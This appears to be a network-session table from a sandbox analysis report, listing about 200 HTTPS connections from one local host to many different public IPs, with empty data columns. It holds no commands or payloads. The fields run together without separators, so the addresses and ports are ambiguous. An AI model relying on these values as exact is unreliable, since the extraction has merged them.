                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16846192.168.2.1434010178.28.227.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16847192.168.2.1455328201.52.72.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16848192.168.2.143276866.5.161.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16849192.168.2.1449068212.195.35.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16850192.168.2.1451050205.57.109.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16851192.168.2.1459186141.191.153.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16852192.168.2.145903090.192.53.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16853192.168.2.1449048177.155.105.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16854192.168.2.1432772147.48.191.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16855192.168.2.144154836.206.30.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16856192.168.2.145865068.145.98.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16857192.168.2.144402052.85.207.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16858192.168.2.143356034.214.174.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16859192.168.2.1438206149.95.177.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16860192.168.2.1439642217.151.50.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16861192.168.2.1444230161.214.198.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16862192.168.2.145894494.234.173.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16863192.168.2.14410061.191.53.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16864192.168.2.1451848190.96.69.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16865192.168.2.1458574159.74.26.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16866192.168.2.1444124212.244.116.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16867192.168.2.1441366148.150.245.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16868192.168.2.145320459.98.250.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16869192.168.2.1459706152.164.142.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16870192.168.2.144439298.127.95.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16871192.168.2.1452796170.46.249.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16872192.168.2.1450794154.205.189.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16873192.168.2.1435062133.22.108.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16874192.168.2.1434600194.5.20.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16875192.168.2.143956893.117.243.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16876192.168.2.1443776117.210.149.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16877192.168.2.1448766218.216.184.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16878192.168.2.1456348163.247.130.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16879192.168.2.1446202136.224.156.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16880192.168.2.144164294.234.166.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16881192.168.2.1440360192.143.226.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16882192.168.2.145066871.10.166.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16883192.168.2.145500253.242.94.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16884192.168.2.1451664208.246.164.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16885192.168.2.144659691.172.86.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16886192.168.2.1435184187.212.125.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16887192.168.2.143703672.6.31.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16888192.168.2.145301645.219.225.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16889192.168.2.1440052142.112.115.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16890192.168.2.1456208203.62.181.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16891192.168.2.145554681.191.91.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16892192.168.2.1456784208.219.205.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16893192.168.2.14422322.198.133.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16894192.168.2.1435508178.114.189.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16895192.168.2.1437904155.166.2.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16896192.168.2.143763270.134.59.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16897192.168.2.145872047.10.171.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16898192.168.2.1457380103.114.128.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16899192.168.2.1456724185.173.152.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16900192.168.2.145480082.167.93.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16901192.168.2.144379412.221.23.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16902192.168.2.1460908106.31.39.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16903192.168.2.1460072202.237.127.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16904192.168.2.1444258138.190.188.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16905192.168.2.1456396116.244.120.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16906192.168.2.1448568180.175.173.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16907192.168.2.144275237.139.248.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16908192.168.2.145875443.188.244.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16909192.168.2.1452580144.187.83.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16910192.168.2.1451234166.10.32.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16911192.168.2.144679620.14.57.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16912192.168.2.1448486101.39.181.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16913192.168.2.1433012122.183.166.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16914192.168.2.145863286.33.171.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16915192.168.2.144004488.200.192.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16916192.168.2.145559063.226.84.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16917192.168.2.145149846.93.45.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16918192.168.2.1458104189.18.142.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16919192.168.2.1453060101.245.216.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16920192.168.2.143867636.62.229.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16921192.168.2.1448734218.252.109.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16922192.168.2.144520283.137.80.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16923192.168.2.1451068163.64.156.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16924192.168.2.1453870217.76.22.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16925192.168.2.1451160123.215.160.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16926192.168.2.1441056125.73.81.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16927192.168.2.1446256204.216.238.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16928192.168.2.145015031.16.224.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16929192.168.2.145935098.240.78.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16930192.168.2.1438926145.191.51.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16931192.168.2.143970887.174.73.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16932192.168.2.1448628146.24.96.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16933192.168.2.1438506221.152.231.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16934192.168.2.1445182147.72.145.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16935192.168.2.1450558218.67.218.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16936192.168.2.144121868.253.195.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16937192.168.2.1450716173.198.179.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16938192.168.2.1459352211.126.163.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16939192.168.2.144115224.185.202.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16940192.168.2.144103462.1.104.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16941192.168.2.1434898216.44.164.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16942192.168.2.1439464172.61.125.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16943192.168.2.1443928220.152.230.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16944192.168.2.143384441.47.160.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16945192.168.2.144159645.216.95.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16946192.168.2.1454472120.127.233.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16947192.168.2.1460596183.33.106.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16948192.168.2.1433286199.36.59.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16949192.168.2.1434542181.195.89.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16950192.168.2.1453404204.127.74.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16951192.168.2.145563046.185.244.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16952192.168.2.144107032.90.195.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16953192.168.2.145908241.37.204.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16954192.168.2.1433176172.201.138.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16955192.168.2.144689262.182.126.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16956192.168.2.1437790206.19.211.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16957192.168.2.1433644204.34.3.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16958192.168.2.1452074108.83.50.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16959192.168.2.1455574121.183.225.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16960192.168.2.14604368.3.82.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16961192.168.2.1436690218.185.58.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16962192.168.2.144747832.14.240.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16963192.168.2.1433750184.142.141.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16964192.168.2.144567875.24.245.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16965192.168.2.1444262198.124.242.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16966192.168.2.144251072.135.23.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16967192.168.2.145455824.93.185.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16968192.168.2.143409451.3.179.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16969192.168.2.1439160164.51.212.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16970192.168.2.145277459.228.165.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16971192.168.2.1453620177.36.102.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16972192.168.2.144445232.150.160.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16973192.168.2.1436954147.245.178.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16974192.168.2.1433288167.51.35.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16975192.168.2.144895214.167.63.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16976192.168.2.1460920179.61.12.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16977192.168.2.1439710191.26.213.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16978192.168.2.1454102207.170.109.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16979192.168.2.143802442.80.15.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16980192.168.2.144103418.244.198.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16981192.168.2.1453226209.98.15.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16982192.168.2.1445892199.223.144.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16983192.168.2.1454324168.147.100.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16984192.168.2.1437270111.119.85.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16985192.168.2.1442278219.192.89.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16986192.168.2.1460134138.58.148.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16987192.168.2.1451312185.16.220.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16988192.168.2.144699247.153.149.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16989192.168.2.1443420151.95.162.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16990192.168.2.1457236195.15.79.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16991192.168.2.1460316105.153.43.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16992192.168.2.1455694129.36.70.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16993192.168.2.145414825.0.190.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16994192.168.2.144153452.239.149.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16995192.168.2.1436866150.218.48.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16996192.168.2.1459332185.227.65.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16997192.168.2.1450844171.105.181.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16998192.168.2.145348640.108.36.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16999192.168.2.144856092.221.175.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17000192.168.2.1444664219.66.246.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17001192.168.2.1440556183.79.227.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17002192.168.2.143789449.161.220.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17003192.168.2.1456002128.125.61.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17004192.168.2.1433340134.139.207.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17005192.168.2.1441780168.46.235.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17006192.168.2.1448218103.71.130.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17007192.168.2.1459378118.171.210.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17008192.168.2.144803013.120.118.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17009192.168.2.1435422156.0.145.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17010192.168.2.1437544147.156.48.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17011192.168.2.1446870177.215.93.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17012192.168.2.1455640175.71.175.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17013192.168.2.145080020.172.44.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17014192.168.2.144980696.228.144.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17015192.168.2.145601425.96.240.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17016192.168.2.144842238.226.99.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17017192.168.2.145882467.23.208.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17018192.168.2.144199441.181.203.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17019192.168.2.145627087.165.107.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17020192.168.2.1441756178.247.202.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17021192.168.2.1446382106.120.139.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17022192.168.2.1434984153.110.90.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17023192.168.2.1436736150.47.21.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17024192.168.2.1451348210.128.126.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17025192.168.2.1454046139.98.136.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17026192.168.2.1436040112.131.104.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17027192.168.2.1456022176.237.61.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17028192.168.2.145408884.77.42.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17029192.168.2.1439334208.163.47.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17030192.168.2.143812441.32.59.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17031192.168.2.145354085.55.187.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17032192.168.2.144162678.174.235.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17033192.168.2.14583981.212.90.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17034192.168.2.1459586182.41.122.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17035192.168.2.143954073.190.112.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17036192.168.2.1439998161.31.128.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17037192.168.2.144861651.172.181.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17038192.168.2.14554722.27.111.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17039192.168.2.1437848153.222.73.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17040192.168.2.1452336154.183.118.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17041192.168.2.1456458182.144.75.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17042192.168.2.145711039.163.82.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17043192.168.2.1449454132.126.207.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17044192.168.2.1458826111.127.211.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17045192.168.2.1457864175.57.162.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17046192.168.2.143551866.130.157.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17047192.168.2.1438838114.224.39.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17048192.168.2.1436934210.35.120.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17049192.168.2.144545614.121.117.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17050192.168.2.145044871.203.239.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17051192.168.2.143395065.220.234.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17052192.168.2.146037298.97.210.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17053192.168.2.143828672.176.141.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17054192.168.2.1455238166.41.221.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17055192.168.2.1439724169.253.251.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17056192.168.2.145583651.58.63.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17057192.168.2.1435198115.184.49.84443
                                                      TimestampBytes transferredDirectionData


